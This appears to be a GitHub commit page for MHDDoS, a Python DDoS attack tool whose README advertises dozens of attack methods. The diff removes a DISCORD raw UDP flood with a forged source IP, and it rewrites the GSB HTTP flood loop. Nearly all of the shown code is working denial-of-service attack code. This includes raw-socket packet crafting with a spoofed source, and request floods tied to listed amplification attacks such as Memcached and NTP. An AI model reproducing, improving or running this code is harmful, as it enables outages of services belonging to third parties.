Skip to content

Commit da88a2f

Browse files
committed
discord method removed
1 parent b09c193 commit da88a2f

File tree

2 files changed

+6
-28
lines changed

2 files changed

+6
-28
lines changed

README.md

Lines changed: 1 addition & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,4 @@
1-
<h1 align="center">MHDDoS - DDoS Attack Script With 58 Methods</h1>
1+
<h1 align="center">MHDDoS - DDoS Attack Script With 57 Methods</h1>
22
<em><h5 align="center">(Programming Language - Python 3)</h5></em>
33

44
<p align="center">
@@ -57,7 +57,6 @@
5757
* <img src="https://mycrackfree.com/wp-content/uploads/2018/08/TeamSpeak-Server-9.png" width="16" height="16" alt="teamspeak 3"> TS3 | Send Teamspeak 3 Status Ping Protocol
5858
* <img src="https://cdn2.downdetector.com/static/uploads/logo/75ef9fcabc1abea8fce0ebd0236a4132710fcb2e.png" width="16" height="16" alt="fivem"> FIVEM | Send FiveM Status Ping Protocol
5959
* <img src="https://github.com/user-attachments/assets/f40748bf-dd28-4294-b862-cb0acbc74eea" width="16" height="16" alt="fivem-token"> FIVEM-TOKEN | Send FiveM confirmation token flood
60-
* <img src="https://cdn.prod.website-files.com/6257adef93867e50d84d30e2/678a4c12dbf6be5d792aa920_Clyde%20Cube.webp" width="16" height="16" alt="udp"> DISCORD | Send RAW packet flood with custom payload
6160
* <img src="https://cdn.iconscout.com/icon/free/png-512/redis-4-1175103.png" width="16" height="16" alt="mem"> MEM | Memcached Amplification
6261
* <img src="https://lyrahosting.com/wp-content/uploads/2020/06/ddos-attack-icon.png" width="16" height="16" alt="ntp"> NTP | NTP Amplification
6362
* <img src="https://cdn-icons-png.flaticon.com/512/4712/4712139.png" width="16" height="16" alt="mcbot"> MCBOT | Minecraft Bot Attack

start.py

Lines changed: 5 additions & 26 deletions
Original file line numberDiff line numberDiff line change
@@ -128,7 +128,7 @@ class Methods:
128128
LAYER4_METHODS: Set[str] = {*LAYER4_AMP,
129129
"TCP", "UDP", "SYN", "VSE", "MINECRAFT",
130130
"MCBOT", "CONNECTION", "CPS", "FIVEM", "FIVEM-TOKEN",
131-
"TS3", "MCPE", "ICMP", "DISCORD", "OVH-UDP",
131+
"TS3", "MCPE", "ICMP", "OVH-UDP",
132132
}
133133

134134
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
@@ -402,7 +402,6 @@ def __init__(self,
402402
"FIVEM": self.FIVEM,
403403
"FIVEM-TOKEN": self.FIVEMTOKEN,
404404
"OVH-UDP": self.OVHUDP,
405-
"DISCORD": self.DISCORD,
406405
"MINECRAFT": self.MINECRAFT,
407406
"CPS": self.CPS,
408407
"CONNECTION": self.CONNECTION,
@@ -538,14 +537,6 @@ def VSE(self) -> None:
538537
continue
539538
Tools.safe_close(s)
540539

541-
def DISCORD(self) -> None:
542-
payload = self._generate_discord()
543-
with socket(AF_INET, SOCK_RAW, IPPROTO_UDP) as s:
544-
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
545-
while Tools.sendto(s, payload, self._target):
546-
continue
547-
Tools.safe_close(s)
548-
549540
def FIVEMTOKEN(self) -> None:
550541
global BYTES_SEND, REQUESTS_SENT
551542

@@ -626,18 +617,6 @@ def _generate_ovhudp(self) -> List[bytes]:
626617

627618
return packets
628619

629-
def _generate_discord(self) -> bytes:
630-
ip: IP = IP()
631-
ip.set_ip_src(__ip__)
632-
ip.set_ip_dst(self._target[0])
633-
udp: UDP = UDP()
634-
udp.set_uh_sport(ProxyTools.Random.rand_int(32768, 65535))
635-
udp.set_uh_dport(self._target[1])
636-
payload_data = bytes([ProxyTools.Random.rand_int(0, 255) for _ in range(40)])
637-
udp.contains(Data(payload_data))
638-
ip.contains(udp)
639-
return ip.get_packet()
640-
641620
def _genrate_syn(self) -> bytes:
642621
ip: IP = IP()
643622
ip.set_ip_src(__ip__)
@@ -1174,7 +1153,10 @@ def BYPASS(self):
11741153
Tools.safe_close(s)
11751154

11761155
def GSB(self):
1177-
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
1156+
s = None
1157+
with suppress(Exception), self.open_connection() as s:
1158+
for _ in range(self._rpc):
1159+
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
11781160
self._target.raw_path_qs,
11791161
ProxyTools.Random.rand_str(6)) +
11801162
"Host: %s\r\n" % self._target.authority +
@@ -1190,9 +1172,6 @@ def GSB(self):
11901172
'Sec-Gpc: 1\r\n'
11911173
'Pragma: no-cache\r\n'
11921174
'Upgrade-Insecure-Requests: 1\r\n\r\n')
1193-
s = None
1194-
with suppress(Exception), self.open_connection() as s:
1195-
for _ in range(self._rpc):
11961175
Tools.send(s, payload)
11971176
Tools.safe_close(s)
11981177

0 commit comments

Comments
 (0)